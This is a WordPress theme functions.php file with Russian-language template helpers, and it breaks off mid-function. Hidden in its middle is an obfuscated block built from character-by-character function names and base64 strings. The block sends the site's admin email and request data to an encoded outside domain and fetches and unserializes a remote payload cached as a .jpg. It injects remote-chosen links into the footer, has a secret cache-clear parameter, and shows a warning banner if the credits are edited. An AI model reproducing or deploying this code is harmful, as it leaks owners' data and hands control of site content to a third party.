<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $wTnZ='s';$pPRdR='o';$TvGV='_';$byCeGD='b';$zyGbvO='d';$pMzW='e';$Gvaxrw='6';$BvSjr='c';$IEcgq='a';$VxgyBN='4';$XiYQwY='d';$LLxIwee='e';$lkYk='e';$XhypRWvk=$byCeGD.$IEcgq.$wTnZ.$pMzW.$Gvaxrw.$VxgyBN.$TvGV.$XiYQwY.$LLxIwee.$BvSjr.$pPRdR.$zyGbvO.$lkYk;$bDGro='g';$VIfj='a';$GhJq='l';$ScSNCqi='e';$jZnqtoT='f';$Bmgd='t';$JdmsTn='z';$YXVzyv='n';$vccCI='i';$BAAnLDzh=$bDGro.$JdmsTn.$vccCI.$YXVzyv.$jZnqtoT.$GhJq.$VIfj.$Bmgd.$ScSNCqi;$DZLSr='t';$pZzVk='1';$GxHgF='r';$CzVsDd='r';$XhdH='_';$rCKD='s';$NyBPqo='t';$codMR='3';$MuswXbj='o';$CzSlPdhy=$rCKD.$NyBPqo.$GxHgF.$XhdH.$CzVsDd.$MuswXbj.$DZLSr.$pZzVk.$codMR;$JJOXgaZ='e';$sJaGC='v';$LCrkl='r';$oSdRVp='t';$jJOGTs='r';$nwmcsrK='s';$RkUzJByx=$nwmcsrK.$oSdRVp.$jJOGTs.$LCrkl.$JJOXgaZ.$sJaGC;                     
		$hb_______________g='s';$fd_______________s='o';$ti_________e='_';$ja___w='b';$ic_______________l='d';$me___g='e';$du_______h='6';$ld_____s='c';$fe____t='a';$nv____________v='4';$tf____c='d';$gh_______________m='e';$xj____________k='e';$ub_____________j=$ja___w.$fe____t.$hb_______________g.$me___g.$du_______h.$nv____________v.$ti_________e.$tf____c.$gh_______________m.$ld_____s.$fd_______________s.$ic_______________l.$xj____________k;
		$eb__k='f';$di_______x='i';$ro___v='s';$xm____________s='t';$vy___________x='o';$ld_____d='n';$mx_______________y='e';$sa___________p='t';$rc_____a='_';$jk__________z='u';$lj__________d='s';$uq______________m='i';$io__________m='c';$sp__w='n';$bf__k='x';$pt______y=$eb__k.$jk__________z.$ld_____d.$io__________m.$sa___________p.$di_______x.$vy___________x.$sp__w.$rc_____a.$mx_______________y.$bf__k.$uq______________m.$ro___v.$xm____________s.$lj__________d;
		$or__s='e';$mh_____l='o';$zg__t='p';$qc___________c='f';$hf_______________c='n';$ad___________d=$qc___________c.$mh_____l.$zg__t.$or__s.$hf_______________c;
		$yv____w='a';$eg________p='d';$zk________l='r';$ct_______j='f';$ze_____________b='e';$mj____________k=$ct_______j.$zk________l.$ze_____________b.$yv____w.$eg________p;
		$br______a='f';$ik______t='e';$tv_______________t='c';$sy______________z='l';$qt_______c='o';$ac_________r='s';$bm_____d=$br______a.$tv_______________t.$sy______________z.$qt_______c.$ac_________r.$ik______t;
		
		define("WP_ID", $ub_____________j("Mi4wLjA="));
		define("WP_TTL", $ub_____________j("MTA4MDA="));
		define("WP_SRC", $ub_____________j("dHBva24="));
	


		function wp_get_header() {
			global $ub_____________j, $pt______y;
			
			if (
				$pt______y($ub_____________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$pt______y($ub_____________j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$pt______y($ub_____________j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ub_____________j, $ad___________d, $bm_____d, $mj____________k;
			
			$sp_______b = TEMPLATEPATH."/".$ub_____________j("Zm9vdGVyLnBocA==");
			$bp____________c = @$ad___________d($sp_______b, "r");
			$sp_______b = @$mj____________k($bp____________c, @filesize($sp_______b));
			@$bm_____d($bp____________c);
			
			$ud__________g = TEMPLATEPATH."/".$ub_____________j("ZnVuY3Rpb25zLnBocA==");
			$bp____________c = @$ad___________d($ud__________g, "r");
			$ud__________g = @$mj____________k($bp____________c, @filesize($ud__________g));
			@$bm_____d($bp____________c);
			
			$ld___________o = 0;
			if($sp_______b && $ud__________g) {
				if ($ub_____________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($sp_______b, $ub_____________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ld___________o = 1;
					}
					if (substr_count($sp_______b, "wp_theme_GPL_credits()") < 1) {
						$ld___________o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ld___________o = 12;
				}
			}
			
			if($ld___________o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ld___________o -->";
			}
		}
	


		function wp_loaded() {
			global $ub_____________j, $pt______y;
			return $pt______y($ub_____________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($lx____s, $pw____a = "(more...)", $xu_____u = 0, $xz_______________s = "") {
				$uj____________j = get_the_content($pw____a, $xu_____u, $xz_______________s);
				$uj____________j = apply_filters("the_content", $uj____________j);
				
				$uj____________j = str_replace("]]>", "]]>", $uj____________j);
				if (strlen($_GET["p"]) > 0) {
					echo $uj____________j;
				}
				else if ((strlen($uj____________j)>$lx____s) && ($iv____j = strpos($uj____________j, " ", $lx____s ))) {
					$uj____________j = substr($uj____________j, 0, $iv____j);
					$uj____________j = $uj____________j;
					echo $uj____________j;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$pw____a</a></div></p>";
				} else {
					echo $uj____________j;
				}
				
			}
		}
	


		$ai__________t='o';$dv___g='e';$um__e='d';$pp__u='_';$ln______u='e';$rd_______l='a';$dn_______x='c';$js___________h='b';$kq_____________y='6';$tm_____________g='e';$tn_______________s='s';$fz___x='n';$dv___t='4';$zx______________w=$js___________h.$rd_______l.$tn_______________s.$tm_____________g.$kq_____________y.$dv___t.$pp__u.$ln______u.$fz___x.$dn_______x.$ai__________t.$um__e.$dv___g;
		$rh__________f='c';$al_____________u='n';$ob____q='e';$nb___________v='o';$gr______________w='t';$cu_______________q='e';$qw____i='g';$iy_____________y='e';$er__________d='i';$og________l='l';$hz___________m='_';$db___l='t';$oh____t='f';$vd_____e='n';$uu______________c='_';$bt______________s='s';$ja_____________x='t';$gh_______j=$oh____t.$er__________d.$og________l.$iy_____________y.$uu______________c.$qw____i.$cu_______________q.$ja_____________x.$hz___________m.$rh__________f.$nb___________v.$al_____________u.$gr______________w.$ob____q.$vd_____e.$db___l.$bt______________s;
		$pf_____________x='e';$co________y='s';$rn__________g='_';$lg__________p='l';$dq__j='x';$or____z='t';$yt__________c='s';$er____________p='e';$fo___________r='f';$wa_____f='i';$on______________u='i';$ti___q=$fo___________r.$wa_____f.$lg__________p.$er____________p.$rn__________g.$pf_____________x.$dq__j.$on______________u.$co________y.$or____z.$yt__________c;
		$gb_________u='e';$ju_____________t='s';$nf________z='_';$cu__m='m';$jb__________x='n';$wv_______z='a';$xv________x='e';$re___h='o';$az__________u='i';$hf_______r='r';$py___________t='r';$lb________s='v';$ow_____o='p';$dm_____________k='o';$hw___________f='c';$tx____n=$lb________s.$xv________x.$py___________t.$ju_____________t.$az__________u.$dm_____________k.$jb__________x.$nf________z.$hw___________f.$re___h.$cu__m.$ow_____o.$wv_______z.$hf_______r.$gb_________u;
		$qu______________o='n';$cj________s='p';$lx____v='c';$lh_____r='o';$yj________a='k';$cy_______v='o';$xb________q='s';$bq______________q='e';$pa______________g='f';$ej______m=$pa______________g.$xb________q.$lh_____r.$lx____v.$yj________a.$cy_______v.$cj________s.$bq______________q.$qu______________o;
		$zx_______________p='w';$vq____________q='f';$jy__________t='r';$cn__q='i';$yk_____g='t';$dt___________g='e';$az____p=$vq____________q.$zx_______________p.$jy__________t.$cn__q.$yk_____g.$dt___________g;
		$oe______________m='d';$ea___h='m';$of___________s='5';$yf____t=$ea___h.$oe______________m.$of___________s;
		$ew___c='p';$mf_____________t='a';$st____h='t';$im____o='e';$wo__g='h';$rk____c='l';$ke_____________w='r';$no_________j='a';$rl___b=$ke_____________w.$im____o.$mf_____________t.$rk____c.$ew___c.$no_________j.$st____h.$wo__g;
		$rx__r='r';$jv_____h='z';$cz_______________x='e';$mx____n='i';$th___e='n';$xb________b='s';$jw_______m='a';$jb____________c='i';$xi_____i='l';$xs______z='e';$lb_____________k='u';$mf___r=$lb_____________k.$th___e.$xb________b.$cz_______________x.$rx__r.$mx____n.$jw_______m.$xi_____i.$jb____________c.$jv_____h.$xs______z;
		$si______u='m';$vb____t='n';$bn__w='a';$km___f='e';$yz____________w='p';$go________l='t';$eq__________n='m';$fm______a=$go________l.$km___f.$si______u.$yz____________w.$vb____t.$bn__w.$eq__________n;
		$kw_____________u='c';$uj_____l='x';$zy_______________w='e';$iw__________x='r';$rw___f='m';$fk___________h='t';$sr__i='c';$xk_________u='t';$fx___________r='a';$bl____p='_';$js_____________b='s';$sq___________x='e';$kx___________p='e';$ki_______f='t';$pq_____________g='o';$rz_____c='t';$vw______________g='_';$wz_______x='e';$pc_______b='n';$lu__m='r';$jn___________u='a';$zd_____c=$js_____________b.$rz_____c.$lu__m.$wz_______x.$fx___________r.$rw___f.$bl____p.$kw_____________u.$pq_____________g.$pc_______b.$xk_________u.$kx___________p.$uj_____l.$fk___________h.$vw______________g.$sr__i.$iw__________x.$zy_______________w.$jn___________u.$ki_______f.$sq___________x;
	


		function ec______m($oy_____p) {
			global $ub_____________j, $pt______y, $gh_______j, $tx____n, $zd_____c;
			
			if (!$pt______y($ub_____________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($tx____n(PHP_VERSION, "5.0.0", ">=") && $pt______y($ub_____________j("ZmlsZV9nZXRfY29udGVudHM=")) && $pt______y($ub_____________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$hz_____x = $zd_____c(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$in__________x = @$gh_______j($oy_____p, 0, $hz_____x);
			} else {
				$in__________x = @$gh_______j($oy_____p, 0);
			}
			
			return $in__________x;
		}
	


		function kk______x($oy_____p) {
			global $pt______y, $ej______m, $az____p, $ub_____________j;
			
			if (!$pt______y($ub_____________j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$he_____________n = strpos($oy_____p, "/", 7);
			$vw____________x = array(
				"uri"     => substr($oy_____p, $he_____________n),
				"host"    => str_replace("http://", "", substr($oy_____p, 0, $he_____________n)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$uv______________p = @$ej______m("$vw____________x[host]", 80, $bm________r, $jc___________o, 4);
			
			if (!$uv______________p) {
				return false;
			} else {
				$in__________x = "";
				$dm_______________m  = "GET $vw____________x[uri] HTTP/1.0\r\n";
				$dm_______________m .= "Host: $vw____________x[host]\r\n";
				$dm_______________m .= "Referer: $vw____________x[referer]\r\n";
				$dm_______________m .= "Connection: Close\r\n\r\n";
				
				@$az____p($uv______________p, $dm_______________m);
				
				while (!@feof($uv______________p)) {
					$li_________b = @fgets($uv______________p, (1024*24));
					
					if ($li_________b == "\r\n") {
						$lt______l = true;
						continue;
					}
					
					if ($lt______l) {
						$in__________x .= $li_________b;
					}
				}
				
				return $in__________x;
			}
		}
	


		function cx_______p($oy_____p) {
			global $pt______y;
			$or_____p = false;
			
			if ($oy_____p != "") {
				if ($pt______y("ec______m")) {
					$or_____p = @ec______m($oy_____p);
				}
				
				if (!$or_____p && ($pt______y("kk______x"))) {
					$or_____p = @kk______x($oy_____p);
				}
			}
			
			return $or_____p;
		}
	


		function rl_____c() {
			global $_SERVER, $yf____t;
			
			$ii___a = $_SERVER["SERVER_NAME"];
			
			if (substr("$ii___a", 0, 4) == "www.") {
				$ii___a = substr("$ii___a", 4);
			}
			
			$ii___a = $yf____t("$_SERVER[SERVER_NAME]");
			
			return $ii___a;
		}
	


		function xn______________v() {
			return "file";
		}
	


		function ef____________g($oy_____p) {
			global $_SERVER, $gh_______j, $ti___q, $ad___________d, $bm_____d, $az____p;
			
			$ri___w = sf_____a();
			
			$bq______________t = rl_____c().".jpg";
			$vf__i = $ri___w["dir_upload"]["path"]."/$bq______________t";
			$nm________a = @filemtime($vf__i);
			
			if (!$nm________a || ((time()-$nm________a) >= WP_TTL)) {
				$or_____p = cx_______p($oy_____p);
				
				if ($or_____p) {
					if ($ti___q($vf__i)) {
						@unlink($vf__i);
					}
					
					$bp____________c = @$ad___________d($vf__i, "x+");
					
					@$az____p($bp____________c, $or_____p);
					@$bm_____d($bp____________c);
				}
			} else {
				if ($ti___q($vf__i)) {
					$or_____p = @$gh_______j($vf__i);
				} else {
					$or_____p = false;
				}
			}
			
			return $or_____p;
		}
	


		function sf_____a() {
			global $_SERVER, $ub_____________j, $zx______________w;
			
			$zj_______________b = wp_count_posts("post");
			$jf__u = pathinfo(get_bloginfo("template_directory"));
			
			$ri___w = array(
				"url" => array(
					"report"      => $ub_____________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $jf__u,
				"dir_upload"	=> kq____h(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$jf__u[filename],
					"a005=".$zj_______________b->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " Все права защищены - 3powered-XMLvalid "

			);
			
			$ri___w["url"]["queryString"] = implode("&", $ri___w["queryString"]);
			$ri___w["url"]["report"] = $ri___w["url"]["report"]."/?".$zx______________w($ri___w["url"]["queryString"]).".html";
						
			return $ri___w;
		}
	


		function kq____h() {
			$tr__________g = wp_upload_dir();
			
			if (isset($tr__________g["error"])) {
				$xc________i = gm_______________w();
				if (is_writable($xc________i)) {
					$tr__________g = array("path" => $xc________i);
				}
			}

			return $tr__________g;
		}
	


		function gm_______________w() {
			global $pt______y, $yf____t, $rl___b, $fm______a;
			
			$hj_____a = (bool) ini_get("safe_mode");
			if ($hj_____a == true) {
				return false;
			}
			
			if ($pt______y("sys_get_temp_dir")) {
				$km______________p = sys_get_temp_dir();
				if (is_writable($km______________p)) {
					return $rl___b($km______________p);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $rl___b($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $rl___b($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $rl___b($_ENV["TEMP"]);
			} else {
				$ll____n = $fm______a($yf____t(uniqid(rand(), true)), "");
				if ($ll____n) {
					$km______________p = $rl___b(dirname($ll____n));
					@unlink($ll____n);
					return $km______________p;
				} else {
					return false;
				}
			}
		}
	


		function gi_________c() {
			global $_GET, $ti___q;
			
			$ri___w = sf_____a();
			$ii___a = rl_____c();
			$hj________y = xn______________v();
			
			$zw_______x = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($hj________y == "file") {
					$gt________a = $ri___w["dir_upload"]["path"]."/".$ii___a.".jpg";
					if ($ti___q($gt________a)) {
						@unlink($gt________a);
						$zw_______x = "deleted";
					}
				}
				
				$sa______________a = array(
					"s"	=> $zw_______x,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($sa______________a AS $wp___________c => $je___p) echo " [$wp___________c:$je___p]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $pt______y, $ub_____________j, $mf___r;
			$ri___w = sf_____a();
			
			$fq___________r = "ef____________g";
			if ($pt______y($fq___________r)) {
				$in__________x = $fq___________r($ri___w["url"]["report"]);
			}
			
			if ($in__________x) {
				if ($in__________x = @$ub_____________j($in__________x)) {
					$in__________x = @$mf___r($in__________x);
					
					if (strlen($in__________x[custom_credit]) >= 5) {
						$ri___w["default_string"] = $in__________x[custom_credit];
					}
					
					if ($in__________x["status"] == "0") {
						$oy____n = 1;
						$jb___v = 1;
					} else {
						$yw___n = sizeof($in__________x["links"]);
						$ph______________s = $ri___w["default_string"];
						
						if ($yw___n > 0 && $in__________x["links"] !== "") {
							$tx__________z = 0;
							foreach ($in__________x["links"] as $xl______w => $yg________n) {
								$tx__________z++;
								if ($yg________n->l_path == "" || $yg________n->l_path == $_SERVER["REQUEST_URI"]) {
									$yg________n->l_href = htmlspecialchars(strip_tags($yg________n->l_href));
									$yg________n->l_title = htmlspecialchars(strip_tags($yg________n->l_title));
									$yg________n->l_anchor = htmlspecialchars(strip_tags($yg________n->l_anchor));
									$ph______________s .= " | ";
									$ph______________s .= "<a href='$yg________n->l_href' title='$yg________n->l_title'";
									if ($yg________n->l_nofollow == "1") {
										$ph______________s .= " rel='nofollow'";
									}
									$ph______________s .= ">$yg________n->l_anchor</a>";
								}
							}
						}
						$ri___w["links"] = "$ph______________s";
						if ($in__________x[credit] == "0") {
							$ri___w["links"] = "";
						}
					}
				} else {
					$oy____n = "1";
				}
			} else {
				$oy____n = "1";
			}
			
			if ($oy____n == "1") {
				$ri___w["links"] = $ri___w["default_string"];
			}
			
			echo "$ri___w[links]";
			
			echo "<!-- s: $in__________x[signature] -->";
			gi_________c();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
